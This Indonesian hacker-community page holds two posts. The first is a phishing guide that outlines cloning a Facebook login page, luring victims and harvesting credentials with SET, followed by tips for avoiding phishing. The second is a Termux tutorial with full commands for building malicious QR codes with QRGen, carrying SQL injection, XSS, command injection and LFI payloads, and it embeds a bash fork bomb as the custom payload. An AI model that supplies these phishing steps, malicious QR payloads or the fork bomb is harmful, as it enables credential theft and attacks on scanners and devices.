Wlingi-Blitar Hacker Pages

Wlingi-Blitar Hacker Pages

Share

03/02/2021

📱📲Cara Melakukan Phishing & Cara Menghindarinya📵💻

Phishing adalah salah satu terminologi yang paling banyak digunakan dalam peretasan. Pada artikel ini, kita akan membahas tentang bagaimana melakukan phishing, bagaimana penyerang menggunakan phishing untuk mencuri data Anda dan bagaimana Anda dapat menghindarinya. Selain itu, artikel ini untuk tujuan pendidikan dan kami tidak mendukung aktivitas ilegal apa pun.

📝 Pertama-tama mari kita bahas tentang apa itu phishing?

Phishing terdengar seperti memancing, dan agak mirip. Pada dasarnya, phishing berarti mencuri data pribadi dan kredensial seseorang dengan menyamar sebagai perusahaan, situs web tepercaya, dll.

🏔️ Mari kita lihat contohnya:
Jika seseorang mengkloning halaman login Facebook dan mengirimi Anda link yang meminta Anda untuk login dan memeriksa maka itu phishing. Namun, ini adalah contoh yang sangat sederhana hanya untuk menunjukkan cara kerjanya. Peretas lebih kreatif daripada hanya menyalin situs web sederhana dan mengirimi Anda pesan. Ini mungkin datang dalam bentuk surat, pemberitahuan atau pesan teks yang memberitahu Anda untuk memeriksa sesuatu atau mengambil tindakan pada akun Anda dan banyak lagi barang lainnya.

Nah, sekarang mari kita bahas langkah-langkah yang digunakan untuk melakukan phishing.

🔓 Bagaimana Cara Melakukan Phishing?
Berikut langkah-langkah dasar menggunakan phishing.

1. Kloning situs terkenal seperti Facebook, Twitter, atau situs apa pun yang mungkin Anda sukai. Pada dasarnya mengkloning halaman login sehingga Anda mendapatkan kata sandi secara langsung.

2. Temukan korban dan kirimkan tautan situs kloning memintanya untuk masuk. Itu tergantung pada kreativitas Anda bagaimana Anda melakukannya.

3. Saat korban login di situs kloning Anda akan mendapatkan detail tentang korban. Anda dapat menemukan cara melakukan hal-hal ini secara online. Alat yang paling banyak digunakan untuk tujuan ini adalah SET (Alat Rekayasa Sosial) dan dapat digunakan di Kali Linux. Jika Anda menginginkan artikel mendetail tentang kloning situs dan mendapatkan kredensial, beri komentar.

🔐 Bagaimana Cara Menghindarinya?

Sekarang mari kita bahas tentang cara menghindari data Anda dicuri oleh phishing. Berikut beberapa tip untuk menghindari phishing. Jangan pernah login di situs yang tidak dikenal:

👉 Jadi, ini sederhana dan cukup jelas. Ada banyak kasus ketika munculan tiba-tiba muncul yang menyarankan Anda untuk mencoba beberapa hal. Dan ketika Anda mengklik di sana, Anda diminta untuk masuk melalui Facebook, gmail, atau akun sosial lainnya. Jangan pernah melakukannya kecuali situs web yang Anda kunjungi adalah situs yang dapat dipercaya.

👉 Membuat akun menggunakan gmail atau Facebook tidak memerlukan kata sandi: Anda membacanya dengan benar. Saat Anda membuat akun, katakanlah situs kencan menggunakan akun Facebook Anda sebagai contoh. Anda tidak perlu menggunakan kata sandi Facebook Anda di dalam situs web itu. Satu-satunya hal yang harus Anda lakukan adalah memberikan izin di Facebook. Jadi, jika Anda diminta memasukkan kata sandi Facebook, pikirkan dua kali sebelum menekan keyboard.

👉 Jangan pernah mengklik link yang dikirim dari akun email yang tidak Anda kenal: Ya, tidak perlu penjelasan lebih lanjut.

📝 Lihat URL Situs Web Sebelum Masuk:
Ini adalah cara paling berguna untuk mencegah diri Anda dari phishing. Selalu periksa alamat webnya. Misalnya jika alamat phishing meminta Anda untuk masuk, URL tersebut tidak akan pernah memiliki URL yang sama dengan URL Facebook "https://www.facebook.com". Ini mungkin memiliki alamat IP seperti "123.123.3.1" atau beberapa URL yang berbeda seperti "www.facebook.com 2". Perhatikan bahwa URL kedua yang saya sebutkan memiliki huruf besar O. Jadi, jika Anda memperhatikan dengan baik, Anda dapat membedakan situs phishing dengan situs yang sebenarnya.

28/02/2020

🎓Membuat Kode QR untuk Meretas Ponsel & Pemindai Lainnya Menggunakan App Termux Android🎓

📋 QRgen untuk Peretasan Kode QR

Alat yang disebut QRGen dapat membuat kode QR berbahaya dan bahkan menyandikan payload yang dibuat khusus. Kategori payload yang tersedia di QRGen dapat diakses dengan menggunakan flag -l dan angka saat menjalankan skrip. Jumlah dan jenis muatan tercantum di bawah ini.

0: SQL Suntikan
1: XSS
2: Injeksi Perintah
3: Format String
4: XXE
5: String Fuzzing
6: SSI Injection
7: LFI / Directory Traversal

Untuk membuat banyak kode QR berbahaya yang memerlukan payload string-fuzzing, Anda hanya perlu menjalankan QRGen.py -l 5 untuk membuat banyak kode untuk pengujian.

📝 Langkah 1: Instal QRGen pada Ubuntu 19

➢$ pkg update && pkg upgrade -y
➢$ pkg update -y && pkg install proot wget tar pulseaudio -y && wget https://raw.githubusercontent.com/AndronixApp/AndronixOrigin/master/Rootfs/Ubuntu19/ubuntu19.sh && chmod +x ubuntu19.sh && ./ubuntu19.sh
➢$ ./start-ubuntu19.sh
➢$ apt update && apt upgrade -y
➢$ apt install -y git python python3 ruby nano wget curl python-pip python3-pip
➢$ pip install --upgrade pip && pip2 install --upgrade pip && pip3 install --upgrade pip

📝 Langkah 2: Membuat Kode QR Berbahaya dari Jenis Muatan

➢$ git clone https://github.com/h0nus/QRGen
➢$ cd QRGen
➢$ ls
➢$ python3 -m pip install -r requirements.txt

Jika install requirements gagal pada paket Pilllow jangan khawatir, kita cari solusinya

➢$ apt-get install -y libpillowfight libpillowfight-dev python-dev python-setuptools python-pil python-tk python-willow python3-pypillowfight python3-willow
➢$ git clone https://github.com/python-imaging/Pillow
➢$ cd Pillow
➢$ make && make install
➢$ pip3 install -r requirements.txt
➢$ python3 setup.py install

📝 Langkah 3: Encode Payloads Kustom

➢$ chmod 711 qrgen.py
➢$ python3 qrgen.py
➢$ python3 qrgen.py -l 5
➢$ cd genqr
➢$ ls
➢$ nano badstuff.txt

Masukkan kode dibawah ini pada badstuff.txt

:(){ :|: & };:

➢$ cd ..
➢$ python3 qrgen.py -w '/username/QRGen/genqr/badstuff.txt'

"Payload path exist, continuing...
Path already cleared or deleted..
Generated 1 payloads!
Opening last generated payload...
Thanks for using QRGen, made by H0nus.."

Jika terjadi Error atau [Errno 2] No such file tahan sementara, akan ada tutorial lain pada postingan selanjutnya.

Want your business to be the top-listed Media Company in Malang?
Click here to claim your Sponsored Listing.

Address


Jalan Danau Seriang Sawojajar
Malang
65139